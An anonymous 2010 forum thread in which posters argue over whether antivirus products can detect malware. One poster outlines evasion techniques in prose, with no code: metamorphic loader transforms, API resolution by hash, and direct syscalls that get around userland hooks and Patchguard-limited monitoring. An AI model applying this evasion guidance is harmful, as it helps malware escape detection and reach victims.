Name: Anonymous 2010-03-27 10:17

>>50-52
You do know there are fairly fullproof methods of having near perfect(it's impossible to get 100% clean now that symantec just flags every file it has never seen before as suspicious, which I find very offensive to those that actually don't produce malware, but have all their new updates flagged by their silly popularity-based detection) detection rates on virustotal? Such methods involve heavy metamorph transforms of the loader, manual API resolving(by hash), and calling to the kernel directly(find out ssdt offsets/ids by loading up ntdll and resolving from there). Current AVs suck balls (and will likely continue to do so for a while) at dealing with such things. I'd be surprised if any manage to detect anything if they function in userland only (and since MS added Patchguard, they can't do ring0 hooks to properly monitor things). Of course, those that run the file sandboxed and have a ring0 driver which can intercept the calls(patchguard disabled, or just run on xp or similar) will be able to use heuristics to find out if you're doing anything bad.

Name: Anonymous 2010-03-27 10:27

>>53
This is the greatest amount of bullshit in a single paragraph  I've seek this week.

Name: Anonymous 2010-03-27 11:23

>>1

Please re-write this in a readable language like C.

Name: Anonymous 2010-03-27 11:57

>>54
Oh really? I'd like to see you prove me wrong.

I've yet to see AVs which can properly handle morphed/VMed malware. Most of them are signature based, and the rest either have some primitive emulation or some active hook-based heuristics.

How do you propose an AV would catch some malware which just uses sysenter/int2F to do syscalls if they don't have a kernel driver which intercepts those calls(keep in mind, Microsoft prevented SSDT hooking as a legitimate method for AV vendors by implementing Patchguard).

Provide some proof for your words >>54, or IHBT.

Name: not >>54 2010-03-28 3:06

I agree with >>56 in essence.
>>53 was not very well written though.
Don't change these.
Name: Email:
Entire Thread Thread List
All trademarks and copyrights on this site are owned by their respective parties. All comments and posts are the responsibility of their own posters.
- Tinychan + 2ch Mode -